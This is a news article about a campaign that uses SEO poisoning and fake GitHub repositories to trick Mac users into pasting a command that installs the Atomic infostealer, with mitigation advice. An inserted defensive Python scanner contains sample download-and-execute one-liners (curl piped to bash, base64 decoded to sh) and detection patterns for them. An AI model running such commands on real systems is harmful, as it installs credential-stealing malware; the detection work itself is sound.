Fast Facts
- SEO Poisoning Attack: A new campaign is targeting Mac users through targeted SEO poisoning, misleading them to malicious GitHub repositories posing as legitimate software.
- Infostealer Deployment: The campaign includes repositories that claim to offer genuine MacOS software but actually deliver the Atomic infostealer (AMOS) when users follow instructions provided on the fake pages.
- Wide-ranging Targets: LastPass reports that various tech and financial companies were targeted, with the campaign utilizing multiple fake GitHub accounts to create convincing listings.
- Mitigation Recommendations: Users are urged to download software only from official app stores and to use robust antivirus protection, along with secure storage methods like password managers, to prevent potential data theft.
An emerging threat campaign is using targeted SEO poisoning to hit Mac users with infostealers.
That’s according to LastPass’s Threat Intelligence, Mitigation, and Escalation (TIME) team, which on Sept. 18 published a blog post dedicated to an emerging threat campaign involving phony GitHub pages claiming to be from legitimate companies. Code repositories have been used in several attacks lately, including the Shai-Hulud worm, the compromise of prolific NPM developer Qix, the Salesloft breach, and more.
According to LastPass blog post authors Alex Cox, Mike Kosak, and Stephanie Schneider, threat actors are publishing GitHub repositories containing malware that claim to be MacOS versions of legitimate software, all the while leveraging SEO to ensure the fake repositories are positioned well in search results.
GitHub Mac Attack
LastPass said the campaign has targeted a range of companies across the technology and financial sectors, including LastPass. In that case, researchers discovered two fake listings from GitHub users for repositories offering “LastPass Premium on MacBook.” The pages used in the campaign were created by multiple GitHub usernames and are littered with MacOS-related terminology.
Each page included a download link with instructions to paste a specific line of code into the Mac terminal. That command, at least in the case of the fake LastPass pages, leads to the download and execution of the Atomic infostealer (also known as AMOS).
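As an added defensive illustration (not code from the LastPass or CrowdStrike research), the following Python scans constructed shell-history lines for the download-and-execute one-liner pattern that these fake pages rely on; the sample commands and URLs are made up for this example.

```python
import re

# Constructed sample of shell-history lines, as a defender might collect from
# an endpoint. Only the last two mimic the paste-into-terminal install pattern
# described in the article; the commands and hosts are invented.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "brew update",
    "git clone https://github.com/example-org/example-repo.git",
    "curl -fsSL https://example.invalid/install.sh | bash",
    "echo 'aGVsbG8=' | base64 -d | sh",
]

# A remote fetch tool ...
FETCHERS = r"\b(curl|wget)\b"
# ... or a decoder that unpacks an embedded payload ...
DECODERS = r"\b(base64\s+(-d|--decode)|xxd\s+-r)\b"
# ... piped straight into an interpreter, optionally via sudo.
INTERPRETERS = r"\|\s*(sudo\s+)?(bash|sh|zsh|python3?|osascript)\b"


def risky_reasons(cmd):
    """Return the reasons a single command line looks like a one-line installer."""
    reasons = []
    if re.search(FETCHERS, cmd) and re.search(INTERPRETERS, cmd):
        reasons.append("remote fetch piped into an interpreter")
    if re.search(DECODERS, cmd) and re.search(INTERPRETERS, cmd):
        reasons.append("decoded payload piped into an interpreter")
    return reasons


def scan_history(lines):
    """Return (command, reasons) pairs for every line that matched a heuristic."""
    hits = []
    for line in lines:
        reasons = risky_reasons(line)
        if reasons:
            hits.append((line, reasons))
    return hits


if __name__ == "__main__":
    for cmd, why in scan_history(SAMPLE_HISTORY):
        print(f"FLAG: {cmd!r} -> {', '.join(why)}")
```

A plain download (curl without a pipe into a shell) is deliberately not flagged, so the heuristic targets the execute-on-paste behaviour rather than ordinary fetches.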
Both pages were created on GitHub on Sept. 16, and LastPass said “these sites were immediately submitted for takedown and are now inactive.”
The technique is not new; LastPass cited research published in July detailing a similar social engineering campaign in which attackers claimed to offer a MacOS version of the package manager Homebrew on GitHub. Following that page’s instructions would similarly lead to malware installation.
And last month, CrowdStrike detailed a campaign by a threat group it tracks as Cookie Spider. The group attempted to compromise more than 300 customer environments using “SHAMOS,” a variant of the aforementioned Atomic infostealer. The campaign similarly utilized malvertising to get its stealer into victim environments, which CrowdStrike said was blocked by its Falcon platform.
“Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims,” CrowdStrike said in its research. “The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.”
CrowdStrike’s research tracked the Cookie Spider campaign back to June, but the Atomic infostealer has been active since at least April 2023, LastPass said.
Mitigating the Mac Attack
Dark Reading asked LastPass why Mac users in particular have been targeted by this campaign and malware. Kosak, senior principal intelligence analyst at LastPass, hypothesizes that the group behind the malware may prefer to focus on macOS systems; the attackers may view Mac users “as something of a low-hanging fruit since the dangerous impression that Macs face less of a malware threat continues to linger.”
To mitigate this threat and others like it, Kosak says organizations and users should only download software from legitimate app stores or, in the case of GitHub, confirm that the repository is managed by the relevant company itself. That said, as Kosak notes, “this can be trickier” in light of recent supply chain attacks like those targeting NPM users.
To defend against infostealers, Kosak recommended using current antivirus or EDR protection and, as expected from LastPass, to avoid “storing your credentials or other sensitive information in your browser and [consider] using a password manager or other secure storage method instead.”